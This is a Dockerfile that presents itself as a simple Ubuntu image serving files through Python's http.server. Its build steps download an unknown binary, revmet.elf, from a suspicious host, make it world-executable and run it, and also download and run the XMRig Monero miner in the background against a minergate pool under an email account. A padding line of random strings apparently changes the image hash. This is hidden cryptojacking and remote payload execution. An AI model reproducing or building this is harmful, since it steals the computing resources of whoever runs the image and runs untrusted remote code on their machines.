FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo 6eMY3Cwj6dsUmZpt3iJ47J2xgVmVcVKG 7UNI0duQtedgUQQftmIWlsMvQWXgXaNN tbo395ctOsnY0XmBbaEH5v8oHWW7hb6B 1FwUKR5ejMYkXcC41aMA56RXndOnLvGG 7lmTuAbJT7RNmw9iva1Pf9L0tFnVtNlL DFSehqNWe9y0JuJUjiNRovwFnnkHbGwZ aziKaq2luXBNeh89wMYFmY46gdVEI3AI 2ZcK9Aliv8ig6ZU7stkmcaVzt9pglVkK eCOjeZmY9X2sNct8n0msuB3lXSWF5MdS EugyMRyiTOKOqZGBsXbLGZCWObZY2vLS wRKlxXrv1LigQar4S1VVjlwmI3TfnV80 voTfdmbgTylz1saGqByDtbDqYvzTHdR6 DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]